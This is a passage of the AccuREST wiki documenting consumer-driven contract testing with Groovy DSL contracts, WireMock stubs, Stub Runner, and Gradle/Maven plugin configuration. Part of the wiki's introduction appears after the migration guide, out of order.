JSONArray).empty\n\n----\n\nand the following stub:\n\n[source,javascript,indent=0]\n----\n{\n \"request\" : {\n \"url\" : \"\/users\/password\",\n \"method\" : \"POST\",\n \"bodyPatterns\" : [ {\n \"matchesJsonPath\" : \"$[?(@.callback_url =~ \/((http[s]?|ftp):\\\\\/)\\\\\/?([^:\\\\\/\\\\s]+)(:[0-9]{1,5})?\/)]\"\n }, {\n \"matchesJsonPath\" : \"$[?(@.email =~ \/([a-zA-Z0-9._%+-]+@[a-zA-Z0-9.-]+\\\\.[a-zA-Z]{2,4})?\/)]\"\n } ],\n \"headers\" : {\n \"Content-Type\" : {\n \"equalTo\" : \"application\/json\"\n }\n }\n },\n \"response\" : {\n \"status\" : 404,\n \"body\" : \"{\\\"code\\\":\\\"123123\\\",\\\"message\\\":\\\"User not found by email = [not.existing@user.com]\\\"}\",\n \"headers\" : {\n \"Content-Type\" : \"application\/json\"\n }\n },\n \"priority\" : 1\n}\n----\n\n## Executing custom methods on server side\nIt is also possible to define a method call to be executed on the server side during the test. Such a method can be added to the class defined as \"baseClassForTests\" in the configuration. Please see the examples below:\n\n### Groovy DSL\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url $(client(regex('^\/api\/[0-9]{2}$')), server('\/api\/12'))\n headers {\n header 'Content-Type': 'application\/json'\n }\n body '''\\\n [{\n \"text\": \"Gonna see you at Warsaw\"\n }]\n'''\n }\n response {\n body (\n path: $(client('\/api\/12'), server(regex('^\/api\/[0-9]{2}$'))),\n correlationId: $(client('1223456'), server(execute('isProperCorrelationId($it)')))\n )\n status 200\n }\n}\n----\n\n### Base Mock Spec\n\n[source,groovy,indent=0]\n----\nabstract class BaseMockMvcSpec extends Specification {\n\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new PairIdController())\n }\n\n void isProperCorrelationId(Integer correlationId) {\n assert correlationId == 123456\n }\n}\n----\n\n## JAX-RS support\nStarting with release 0.8.0 we support JAX-RS 2 Client API. Base class needs to define `protected WebTarget webTarget` and server initialization, right now the only option how to test JAX-RS API is to start a web server.\n\nRequest with a body needs to have a content type set otherwise `application\/octet-stream` is going to be used.\n\nIn order to use JAX-RS mode, use the following settings:\n\n[source,groovy,indent=0]\n----\ntestMode = 'JAXRSCLIENT'\n----\n\nExample of a test API generated:\n\n[source,groovy,indent=0]\n----\nclass FraudDetectionServiceSpec extends MvcSpec {\n\n\tdef shouldMarkClientAsNotFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":123.123}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus == \"OK\"\n\t\t\tassertThatRejectionReasonIsNull(responseBody.rejectionReason)\n\t}\n\n\tdef shouldMarkClientAsFraud() {\n\t\twhen:\n\t\t\tdef response = webTarget\n\t\t\t\t\t.path('\/fraudcheck')\n\t\t\t\t\t.request()\n\t\t\t\t\t.method('put', entity('{\"clientPesel\":\"1234567890\",\"loanAmount\":99999}', 'application\/vnd.fraud.v1+json'))\n\n\t\t\tString responseAsString = response.readEntity(String)\n\n\t\tthen:\n\t\t\tresponse.status == 200\n\t\t\tresponse.getHeaderString('Content-Type') == 'application\/vnd.fraud.v1+json'\n\t\tand:\n\t\t\tdef responseBody = new JsonSlurper().parseText(responseAsString)\n\t\t\tresponseBody.fraudCheckStatus ==~ java.util.regex.Pattern.compile('[A-Z]{5}')\n\t\t\tresponseBody.rejectionReason == \"Amount too high\"\n\t}\n\n}\n----\n\n# 4. Client Side\n\nDuring the tests you want to have a Wiremock instance up and running that simulates the service Y.\nYou would like to feed that instance with a proper stub definition. That stub definition would need\nto be valid from the Wiremock's perspective but should also be reusable on the server side.\n\n__Summing it up:__ On this side, in the stub definition, you can use patterns for request stubbing and you need exact\nvalues for responses.\n\n# 5. Server Side\n\nBeing a service Y since you are developing your stub, you need to be sure that it's actually resembling your\nconcrete implementation. You can't have a situation where your stub acts in one way and your application on\nproduction behaves in a different way.\n\nThat's why from the provided stub acceptance tests will be generated that will ensure\nthat your application behaves in the same way as you define in your stub.\n\n__Summing it up:__ On this side, in the stub definition, you need exact values as request and can use patterns\/methods\nfor response verification.\n\n# 6. Examples\n\n[source,groovy,indent=0]\n----\nio.codearte.accurest.dsl.GroovyDsl.make {\n request {\n method 'PUT'\n url '\/api\/12'\n headers {\n header 'Content-Type': 'application\/vnd.com.ofg.twitter-places-analyzer.v1+json'\n }\n body '''\\\n [{\n \"created_at\": \"Sat Jul 26 09:38:57 +0000 2014\",\n \"id\": 492967299297845248,\n \"id_str\": \"492967299297845248\",\n \"text\": \"Gonna see you at Warsaw\",\n \"place\":\n {\n \"attributes\":{},\n \"bounding_box\":\n {\n \"coordinates\":\n [[\n [-77.119759,38.791645],\n [-76.909393,38.791645],\n [-76.909393,38.995548],\n [-77.119759,38.995548]\n ]],\n \"type\":\"Polygon\"\n },\n \"country\":\"United States\",\n \"country_code\":\"US\",\n \"full_name\":\"Washington, DC\",\n \"id\":\"01fbe706f872cb32\",\n \"name\":\"Washington\",\n \"place_type\":\"city\",\n \"url\": \"http:\/\/api.twitter.com\/1\/geo\/id\/01fbe706f872cb32.json\"\n }\n }]\n'''\n }\n response {\n status 200\n }\n}\n----\n\n# 7. Scenarios\n\nIt's possible to handle scenarios with Accurest. All you need to do is to stick to proper naming convention while creating your contracts. The convention requires to include order number followed by the underscore.\n\n[source,indent=0]\n----\nmy_contracts_dir\\\n scenario1\\\n 1_login.groovy\n 2_showCart.groovy\n 3_logout.groovy\n----\n\nSuch tree will cause Accurest generating Wiremock's scenario with name `scenario1` and three steps:\n - login marked as `Started` pointing to:\n - showCart marked as `Step1` pointing to:\n - logout marked as `Step2` which will close the scenario.\nMore details about Wiremock scenarios can be found under [http:\/\/wiremock.org\/stateful-behaviour.html](http:\/\/wiremock.org\/stateful-behaviour.html)\n\nAccurest will also generate tests with guaranteed order of execution.\n\n# 8. Stub Runner\n\nOne of the issues that you could have encountered while using AccuREST was to pass the generated WireMock JSON stubs from the server side to the client side (or various clients). Copying the JSON files manually is out of the question.\n\nIn this article you'll see how to prepare your project to start publishing stubs as JARs and how to use Stub Runner in your tests to run WireMock servers and feed them with stub definitions.\n\n## Publishing stubs as JARs\n\nThe easiest approach would be to centralize the way stubs are kept. For example you can keep them as JARs in a Maven repository.\n\n### Gradle\n\nExample of AccuREST Gradle setup:\n\n[source,groovy,indent=0]\n----\n\tapply plugin: 'maven-publish'\n\n\text {\n\t\twiremockStubsOutputDirRoot = file(\"${project.buildDir}\/production\/${project.name}-stubs\/\")\n\t\twiremockStubsOutputDir = new File(wiremockStubsOutputDirRoot)\n\t}\n\n\taccurest {\n\t\ttargetFramework = 'Spock'\n\t\ttestMode = 'MockMvc'\n\t\tbaseClassForTests = 'com.toomuchcoding.MvcSpec'\n\t\tcontractsDslDir = file(\"${project.projectDir.absolutePath}\/mappings\/\")\n\t\tgeneratedTestSourcesDir = file(\"${project.buildDir}\/generated-sources\/\")\n\t\tstubsOutputDir = wiremockStubsOutputDir\n\t}\n\n\ttask stubsJar(type: Jar, dependsOn: [\"generateWireMockClientStubs\"]) {\n\t baseName = \"${project.name}-stubs\"\n\t from wiremockStubsOutputDirRoot\n\t}\n\n\tartifacts {\n\t archives stubsJar\n\t}\n\n\tpublishing {\n\t publications {\n\t stubs(MavenPublication) {\n\t artifactId \"${project.name}-stubs\"\n\t artifact stubsJar\n\t }\n\t }\n\t}\n----\n\n### Maven\n\nExample of Maven can be found in the [AccuREST Maven Plugin README](https:\/\/github.com\/Codearte\/accurest-maven-plugin\/#publishing-wiremock-stubs-projectf-stubsjar)\n\n## Using Stub Runner to automate running stubs\n\nStub Runner automates downloading stubs from a Maven repository (that includes also the local Maven repository) and starting the WireMock server for each of those stubs.\n\n### Modules\n\nAccuREST comes with a new structure of modules\n\n[source,indent=0]\n----\n\u2514\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner\n \u251c\u2500\u2500 stub-runner-junit\n \u251c\u2500\u2500 stub-runner-spring\n \u2514\u2500\u2500 stub-runner-spring-cloud\n----\n\n#### Stub Runner\n\nContains core logic of Stub Runner. Gives you a main class to run Stub Runner from the command line or from Gradle.\n\nHere you can see a list of options with which you can run Stub Runner:\n\n[source,indent=0]\n----\njava -jar stub-runner.jar [options...]\n -maxp (--maxPort) N : Maximum port value to be assigned to the\n Wiremock instance. Defaults to 15000\n (default: 15000)\n -minp (--minPort) N : Minimal port value to be assigned to the\n Wiremock instance. Defaults to 10000\n (default: 10000)\n -s (--stubs) VAL : Comma separated list of Ivy representation of\n jars with stubs. Eg. groupid:artifactid1,group\n id2:artifactid2:classifier\n -sr (--stubRepositoryRoot) VAL : Location of a Jar containing server where you\n keep your stubs (e.g. http:\/\/nexus.net\/content\n \/repositories\/repository)\n -ss (--stubsSuffix) VAL : Suffix for the jar containing stubs (e.g.\n 'stubs' if the stub jar would have a 'stubs'\n classifier for stubs: foobar-stubs ).\n Defaults to 'stubs' (default: stubs)\n -wo (--workOffline) : Switch to work offline. Defaults to 'false'\n (default: false)\n----\n\nYou can either produce a fat-jar and run the app like presented above.\n\nYou can also configure the stub runner by either passing the full arguments list with the `-Pargs` like this:\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pargs=\"-c pl -minp 10000 -maxp 10005 -s a:b:c,d:e,f:g:h\"`\n\nor each parameter separately with a `-P` prefix and without the hyphen (-) in the name of the param\n\n`.\/gradlew stub-runner-root:stub-runner:run -Pc=pl -Pminp=10000 -Pmaxp=10005 -Ps=a:b:c,d:e,f:g:h`\n\n#### Stub Runner JUnit Rule\n\nStub Runner comes with a JUnit rule thanks to which you can very easily download and run stubs for given group and artifact id:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n .downloadStub(\"io.codearte:stub1\", \"io.codearte:stub2:classifier\", \"io.codearte:stub3\");\n----\n\nAfter that rule gets executed Stub Runner connects to your Maven repository and for the given list of dependencies tries to:\n* download them\n* cache them locally\n* unzip them to a temporary folder\n* start a WireMock server for each Maven dependency on a random port from the provided range of ports\n* feed the WireMock server with all JSON files that are valid WireMock definitions\n\nStub Runner uses [Groovy's Grape](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) mechanism to download the Maven dependencies. Check their [docs](http:\/\/docs.groovy-lang.org\/latest\/html\/documentation\/grape.html) for more information.\n\nSince the `AccurestRule` implements the `StubFinder` it allows you to find the started stubs:\n\n[source,groovy,indent=0]\n----\ninterface StubFinder {\n\t\/**\n\t * For the given groupId and artifactId tries to find the matching\n\t * URL of the running stub.\n\t *\n\t * @param groupId - might be null. In that case a search only via artifactId takes place\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String groupId, String artifactId)\n\n\t\/**\n\t * For the given Ivy notation {@code groupId:artifactId} tries to find the matching\n\t * URL of the running stub. You can also pass only {@code artifactId}.\n\t *\n\t * @param ivyNotation - Ivy representation of the Maven artifact\n\t * @return URL of a running stub or null if not found\n\t *\/\n\tURL findStubUrl(String ivyNotation)\n\n\t\/**\n\t * Returns all running stubs\n\t *\/\n\tRunningStubs findAllRunningStubs()\n}\n----\n\nExample of usage in Spock tests:\n\n[source,groovy,indent=0]\n----\n@ClassRule @Shared AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot('http:\/\/your.repo.com')\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\")\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') != null\n\t\t\trule.findStubUrl('loanIssuance') == rule.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\trule.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\trule.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\trule.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${rule.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${rule.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n----\n\nExample of usage in JUnit tests:\n\n[source,java,indent=0]\n----\n@ClassRule public static AccurestRule rule = new AccurestRule()\n\t\t\t.repoRoot(\"http:\/\/your.repo.com\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs\", \"loanIssuance\")\n\t\t\t.downloadStub(\"io.codearte.accurest.stubs:fraudDetectionServer\");\n\n\t@Test\n\tpublic void should_start_wiremock_servers() throws Exception {\n\t\t\/\/ expect: 'WireMocks are running'\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isNotNull();\n\t\t\tthen(rule.findStubUrl(\"loanIssuance\")).isEqualTo(rule.findStubUrl(\"io.codearte.accurest.stubs\", \"loanIssuance\"));\n\t\t\tthen(rule.findStubUrl(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isNotNull();\n\t\t\/\/ and:\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"loanIssuance\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs\", \"fraudDetectionServer\")).isTrue();\n\t\t\tthen(rule.findAllRunningStubs().isPresent(\"io.codearte.accurest.stubs:fraudDetectionServer\")).isTrue();\n\t\t\/\/ and: 'Stubs were registered'\n\t\t\tthen(httpGet(rule.findStubUrl(\"loanIssuance\").toString() + \"\/name\")).isEqualTo(\"loanIssuance\");\n\t\t\tthen(httpGet(rule.findStubUrl(\"fraudDetectionServer\").toString() + \"\/name\")).isEqualTo(\"fraudDetectionServer\");\n\t}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring\n\nIf you're using Spring then you can just import the `io.codearte.accurest.stubrunner.spring.StubRunnerConfiguration` and a bean of type `StubFinder` will get registered.\n\nIn order to find a URL and port of a given dependency you can autowire the bean in your test and call its methods:\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(classes = Config, loader = SpringApplicationContextLoader)\nclass StubRunnerConfigurationSpec extends Specification {\n\n\t@Autowired StubFinder stubFinder\n\n\tdef 'should start WireMock servers'() {\n\t\texpect: 'WireMocks are running'\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') != null\n\t\t\tstubFinder.findStubUrl('loanIssuance') == stubFinder.findStubUrl('io.codearte.accurest.stubs', 'loanIssuance')\n\t\t\tstubFinder.findStubUrl('io.codearte.accurest.stubs:fraudDetectionServer') != null\n\t\tand:\n\t\t\tstubFinder.findAllRunningStubs().isPresent('loanIssuance')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs', 'fraudDetectionServer')\n\t\t\tstubFinder.findAllRunningStubs().isPresent('io.codearte.accurest.stubs:fraudDetectionServer')\n\t\tand: 'Stubs were registered'\n\t\t\t\"${stubFinder.findStubUrl('loanIssuance').toString()}\/name\".toURL().text == 'loanIssuance'\n\t\t\t\"${stubFinder.findStubUrl('fraudDetectionServer').toString()}\/name\".toURL().text == 'fraudDetectionServer'\n\t}\n\n\t@Configuration\n\t@Import(StubRunnerConfiguration)\n\t@EnableAutoConfiguration\n\tstatic class Config {}\n}\n----\n\nCheck the *Common properties for JUnit and Spring* for more information on how to apply global configuration of Stub Runner.\n\n#### Stub Runner Spring Cloud\n\nIf you're using Spring Cloud then it's enough to add `stub-runner-spring-cloud` on classpath and automatically a bean of type `StubFinder` will get registered.\n\n#### Common properties for JUnit and Spring\n\nSome of the properties that are repetitive can be set using system properties or property sources (for Spring). Here are their names with their default values:\n\n[width=\"60%\",frame=\"topbot\",options=\"header\"]\n|======================\n| Property name | Default value | Description |\n|stubrunner.port.range.min|10000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.port.range.max|15000| Minimal value of a port for a started WireMock with stubs|\n|stubrunner.stubs.repository.root|| Maven repo url. If blank then will call the local maven repo|\n|stubrunner.stubs.classifier|stubs| Default classifier for the stub artifacts|\n|stubrunner.work-offline|false| If true then will not contact any remote repositories to download stubs|\n|stubrunner.stubs|| Comma separated list of Ivy notation of stubs to download|\n|======================\n\n# 9. Migration Guide\n\n# Migration to 0.4.7\n- in 0.4.7 we've fixed package name (coderate to codearte) so you've to do the same in your projects. This means replacing ```io.coderate.accurest.dsl.GroovyDsl``` with ```io.codearte.accurest.dsl.GroovyDsl```\n\n# Migration to 1.0.0-RC1\n- from 1.0.0 we're distinguish ignored contracts from excluded contracts:\n - `excludedFiles` pattern tells Accurest to skip processing those files at all\n - `ignoredFiles` pattern tells Accurest to generate contracts and tests, but tests will be marked as `@Ignore`\n\n- from 1.0.0 the `basePackageForTests` behaviour has changed\n - prior to the change all DSL files had to be under `contractsDslDir`\/`basePackageForTests`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - now all DSL files have to be under `contractsDslDir`\/*subpackage* resulting in `basePackageForTests`.*subpackage* test package creation\n - If you don't migrate to the new approach you will have your tests under `contractsDslDir`.`contractsDslDir`.*subpackage*[:github-tag: master\n:github-repo: Codearte\/accurest\n:github-raw: http:\/\/raw.github.com\/{github-repo}\/{github-tag}\n:github-code: http:\/\/github.com\/{github-repo}\/tree\/{github-tag}\n:toc: left\n\nWelcome to the AccuREST Wiki!\n\nPlease follow to the Introduction page to start your journey with Consumer Driven Contracts in JVM\n\n# 1. Introduction\n\nJust to make long story short - AccuREST is a tool that enables Consumer Driven Contract (CDC) development of JVM-based applications. It is shipped with __REST Contract Definition Language__ (DSL). Contract definitions are used by AccuREST to produce following resources:\n* JSON stub definitions to be used by Wiremock when doing integration testing on the client code (__client tests__). Test code must still be written by hand, test data is produced by AccuREST.\n* Acceptance tests (in Spock) used to verify if server-side implementation of the API is compliant with the contract (__server tests__). Full test is generated by AccuREST.\n\nAccuREST moves TDD to the level of software architecture.\n\n# Why?\n\nThe main purposes of AccuREST are:\n\n - to ensure that WireMock stubs (used when developing the client) are doing exactly what actual server-side implementation will do,\n - to promote ATDD method and Microservices architectural style,\n - to provide a way to publish changes in contracts that are immediately visible on both sides,\n - to generate boilerplate test code used on the server side.\n\n# 2. Using in your project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta** . Of course the higher the better :)\n\n# 2.1. Gradle Project\n\n## Prerequisites\n\nIn order to use Accurest with Wiremock you have to have Wiremock in version at least **2.0.0-beta** . Of course the higher the better :)\n\n## Add gradle plugin\n\n[source,groovy,indent=0]\n----\nbuildscript {\n\trepositories {\n\t\tmavenCentral()\n\t}\n\tdependencies {\n\t\tclasspath 'io.codearte.accurest:accurest-gradle-plugin:0.9.9'\n\t}\n}\n\napply plugin: 'accurest'\n\ndependencies {\n\ttestCompile 'org.spockframework:spock-core:1.0-groovy-2.4'\n testCompile 'com.github.tomakehurst:wiremock:2.0.4-beta' \/\/ you have to use WireMock with 2.0 versions of JsonPath\n\ttestCompile 'com.jayway.restassured:rest-assured:2.4.1'\n\ttestCompile 'com.jayway.restassured:spring-mock-mvc:2.4.1' \/\/ needed if you're going to use Spring MockMvc\n}\n----\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal> \/\/ for JUnit tests, use generateSpecs for Spock Specification\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in src\/test\/resources\/stubs directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\nsrc\/test\/resources\/stubs\/myservice\/shouldCreateUser.groovy\nsrc\/test\/resources\/stubs\/myservice\/shouldReturnUser.groovy\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - shouldCreateUser()\n - shouldReturnUser()\n\n## Run plugin\n\nPlugin registers itself to be invoked before `compileTestGroovy` task. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateAccurest` task.\n\n## Configure plugin\n\nTo change default configuration just add `accurest` snippet to your Gradle config\n\n[source,groovy,indent=0]\n----\naccurest {\n\ttestMode = 'MockMvc'\n\tbaseClassForTests = 'org.mycompany.tests'\n\tgeneratedTestSourcesDir = project.file('src\/accurest')\n}\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default MockMvc which is based on Spring's MockMvc. It can also be changed to **JaxRsClient** or to **Explicit** for real HTTP calls.\n - **imports** - array with imports that should be included in generated tests (for example ['org.myorg.Matchers']). By default empty array []\n - **staticImports** - array with static imports that should be included in generated tests(for example ['org.myorg.Matchers.*']). By default empty array []\n - **basePackageForTests** - specifies base package for all generated tests. By default set to io.codearte.accurest.tests\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **ignoredFiles** - Ant matcher allowing defining stub files for which processing should be skipped. By default empty array []\n - **contractsDslDir** - directory containing contracts written using the GroovyDSL. By default `$rootDir\/src\/test\/accurest`\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `$buildDir\/generated-test-sources\/accurest`\n - **stubsOutputDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed\n - **targetFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke:\n`.\/gradlew generateAccurest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in src\/test\/resources\/stubs and generate Wiremock json stubs using: `.\/gradlew generateWireMockClientStubs` command. Note that `stubsOutputDir` option has to be set for stub generation to work.\n\nWhen present, json stubs can be used in consumer automated tests.\n\n[source,groovy,indent=0]\n----\n@ContextConfiguration(loader = SpringApplicationContextLoader, classes = Application)\nclass LoanApplicationServiceSpec extends Specification {\n\n @ClassRule\n @Shared\n WireMockClassRule wireMockRule = new WireMockClassRule()\n\n @Autowired\n LoanApplicationService sut\n\n def 'should successfully apply for loan'() {\n given:\n \tLoanApplication application =\n\t\t\tnew LoanApplication(client: new Client(pesel: '12345678901'), amount: 123.123)\n when:\n\tLoanApplicationResult loanApplication = sut.loanApplication(application)\n then:\n\tloanApplication.loanApplicationStatus == LoanApplicationStatus.LOAN_APPLIED\n\tloanApplication.rejectionReason == null\n }\n}\n----\n\nUnderneath LoanApplication makes a call to FraudDetection service. This request is handled by Wiremock server configured using stubs generated by Accurest.\n\n# 2.2. Using in your Maven project\n\n## Add maven plugin\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n<\/plugin>\n----\n\nRead more: [accurest-maven-plugin](https:\/\/github.com\/Codearte\/accurest-maven-plugin)\n\n## Add stubs\n\nBy default Accurest is looking for stubs in `src\/test\/accurest` directory.\nDirectory containing stub definitions is treated as a class name, and each stub definition is treated as a single test.\nWe assume that it contains at least one directory which will be used as test class name. If there is more than one level of nested directories all except the last one will be used as package name.\nSo with following structure\n\n[source,groovy,indent=0]\n----\nsrc\/test\/accurest\/myservice\/shouldCreateUser.groovy\nsrc\/test\/accurest\/myservice\/shouldReturnUser.groovy\n----\n\nAccurest will create test class `defaultBasePackage.MyService` with two methods\n - `shouldCreateUser()`\n - `shouldReturnUser()`\n\n## Run plugin\n\nPlugin goal `generateTests` is assigned to be invoked in phase `generate-test-sources`. You have nothing to do as long as you want it to be part of your build process. If you just want to generate tests please invoke `generateTests` goal.\n\n## Configure plugin\n\nTo change default configuration just add `configuration` section to plugin definition or `execution` definition.\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <executions>\n <execution>\n <goals>\n <goal>convert<\/goal>\n <goal>generateStubs<\/goal>\n <goal>generateTests<\/goal>\n <\/goals>\n <\/execution>\n <\/executions>\n <configuration>\n <basePackageForTests>com.ofg.twitter.place<\/basePackageForTests>\n <baseClassForTests>com.ofg.twitter.place.BaseMockMvcSpec<\/baseClassForTests>\n <\/configuration>\n<\/plugin>\n----\n\n### Configuration options\n\n - **testMode** - defines mode for acceptance tests. By default `MockMvc` which is based on Spring's MockMvc. It can also be changed to `JaxRsClient` or to `Explicit` for real HTTP calls.\n - **basePackageForTests** - specifies base package for all generated tests. By default set to `io.codearte.accurest.tests`.\n - **ruleClassForTests** - specifies Rule which should be added to generated test classes.\n - **baseClassForTests** - base class for generated tests. By default `spock.lang.Specification`.\n - **contractsDir** - directory containing contracts written using the GroovyDSL. By default `\/src\/test\/accurest`.\n - **generatedTestSourcesDir** - test source directory where tests generated from Groovy DSL should be placed. By default `target\/generated-test-sources\/accurest`.\n - **mappingsDir** - dir where the generated Wiremock stubs from Groovy DSL should be placed.\n - **testFramework** - the target test framework to be used; currently Spock and JUnit are supported with Spock being the default framework\n\n## Base class for tests\n\n When using Accurest in default MockMvc you need to create a base specification for all generated acceptance tests. In this class you need to point to endpoint which should be verified.\n\n[source,groovy,indent=0]\n----\npackage org.mycompany.tests\n\nimport org.mycompany.ExampleSpringController\nimport com.jayway.restassured.module.mockmvc.RestAssuredMockMvc\nimport spock.lang.Specification\n\nclass MvcSpec extends Specification {\n def setup() {\n RestAssuredMockMvc.standaloneSetup(new ExampleSpringController())\n }\n}\n----\n\nIn case of using `Explicit` mode, you can use base class to initialize the whole tested app similarly as in regular integration tests. In case of `JAXRSCLIENT` mode this base class should also contain `protected WebTarget webTarget` field, right now the only option to test JAX-RS API is to start a web server.\n\n## Invoking generated tests\n\nAccurest Maven Plugins generates verification code into directory `\/generated-test-sources\/accurest` and attach this directory to `testCompile` goal.\n\nFor Groovy Spock code use:\n\n[source,xml,indent=0]\n----\n<plugin>\n\t<groupId>org.codehaus.gmavenplus<\/groupId>\n\t<artifactId>gmavenplus-plugin<\/artifactId>\n\t<version>1.5<\/version>\n\t<executions>\n\t\t<execution>\n\t\t\t<goals>\n\t\t\t\t<goal>testCompile<\/goal>\n\t\t\t<\/goals>\n\t\t<\/execution>\n\t<\/executions>\n\t<configuration>\n\t\t<testSources>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.basedir}\/src\/test\/groovy<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t\t<testSource>\n\t\t\t\t<directory>${project.build.directory}\/generated-test-sources\/accurest<\/directory>\n\t\t\t\t<includes>\n\t\t\t\t\t<include>**\/*.groovy<\/include>\n\t\t\t\t<\/includes>\n\t\t\t<\/testSource>\n\t\t<\/testSources>\n\t<\/configuration>\n<\/plugin>\n----\n\nTo ensure that provider side is complaint with defined contracts, you need to invoke `mvn generateTest test`\n\n## Accurest on consumer side\n\nIn consumer service you need to configure Accurest plugin in exactly the same way as in case of provider. You need to copy contracts stored in `src\/test\/accurest` and generate Wiremock json stubs using: `mvn generateStubs` command. By default generated WireMock mapping is stored in directory `target\/mappings`. Your project should create from this generated mappings additional artifact with classifier `stubs` for easy deploy to maven repository.\n\nSample configuration:\n\n[source,xml,indent=0]\n----\n<plugin>\n <groupId>io.codearte.accurest<\/groupId>\n <artifactId>accurest-maven-plugin<\/artifactId>\n <version>${accurest.version}<\/version>\n <executions>\n <execution>\n 